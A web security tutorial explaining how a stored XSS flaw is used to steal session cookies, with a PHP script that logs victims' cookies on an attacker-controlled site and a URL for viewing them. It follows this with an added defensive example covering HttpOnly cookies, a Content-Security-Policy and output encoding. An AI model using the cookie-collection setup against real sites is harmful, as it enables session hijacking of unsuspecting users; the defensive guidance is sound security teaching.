I've seen many tutorials over the last few months regarding the good old alert('XSS') piece of XSS, but in essence this does very little for you: it just proves that the site is vulnerable to XSS.
So a good way to really exploit and make use of a persistent XSS vulnerability is to do the following:
- You need to set up a site where you can store the information you collect from the victim site. (This destination must be reachable over the internet, or at least from the victim server/site.)
- Create a script that will allow the attacker website to accept the retrieved cookie information; call it getsumcookies.php:
<?php
// Record who sent the request (IP and browser), then the raw query string,
// which is where the posted cookie value arrives.
$ip = $_SERVER['REMOTE_ADDR'];
$browser = $_SERVER['HTTP_USER_AGENT'];
$fp = fopen('getsumcookies.txt', 'a');
fwrite($fp, $ip . ' ' . $browser . " \n");
fwrite($fp, urldecode($_SERVER['QUERY_STRING']) . " \n\n");
fclose($fp);
- Create a script that you will use on the victim site to retrieve the cookie(s) and post them to your attacker site:
- Any user who connects to the vulnerable, and now exploited, page will send their cookies to the attacker site, and the attacker can browse them by visiting:
http://attackersite.site/getsumcookies.txt
The scary thing about this is that it is completely transparent to the users connecting to the website: there will be no indication that they are sending their authenticated cookie value to another website.
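From the defender's side, the scenario above is stopped at three separate points: the session cookie is flagged HttpOnly so injected script cannot read it through document.cookie, a Content-Security-Policy refuses inline script and connections to other origins, and stored user content is encoded on output so a persisted payload renders as text instead of executing. The following is an added example (not code from the original post) that puts all three together in PHP; it assumes PHP 7.3 or newer for the setcookie options array and treats a comment field as the stored content.

```php
<?php
// Added example, not part of the original post. Assumes PHP 7.3+.

// 1. Session cookie flags. HttpOnly keeps document.cookie from ever exposing
//    the session id to script; Secure restricts it to HTTPS; SameSite limits
//    cross-site sending. These must be set before session_start().
ini_set('session.cookie_httponly', '1');
ini_set('session.cookie_secure', '1');
ini_set('session.cookie_samesite', 'Strict');
session_start();

// Any other application cookie gets the same flags via the options array.
setcookie('prefs', 'dark', [
    'expires'  => time() + 86400,
    'path'     => '/',
    'secure'   => true,
    'httponly' => true,
    'samesite' => 'Strict',
]);

// 2. Content-Security-Policy: no inline script, and fetches, images and
//    navigations initiated by script may only target this origin, so a payload
//    that does run has nowhere external to post the cookie. Sent before any output.
header("Content-Security-Policy: default-src 'self'; script-src 'self'; connect-src 'self'; img-src 'self'");

// 3. Output encoding for stored (persistent) user content, the root-cause fix.
//    Encode at render time so "<script>" stored in the database reaches the
//    browser as &lt;script&gt; and is displayed, not executed.
function render_comment(string $stored): string
{
    return '<p>' . htmlspecialchars($stored, ENT_QUOTES | ENT_HTML5, 'UTF-8') . '</p>';
}

// Constructed sample of a stored comment containing the classic probe from above.
$stored = "<script>alert('XSS')</script>";
echo render_comment($stored);
```

When this page is served, the constructed comment is emitted as a paragraph whose text reads literally &lt;script&gt;alert(&#039;XSS&#039;)&lt;/script&gt; rather than a script element, and even a payload that slipped past encoding elsewhere would find document.cookie empty of the session id and be blocked by the CSP from reaching any other host. Encoding is the fix; HttpOnly and CSP are the layers that limit the damage when the fix is missed somewhere.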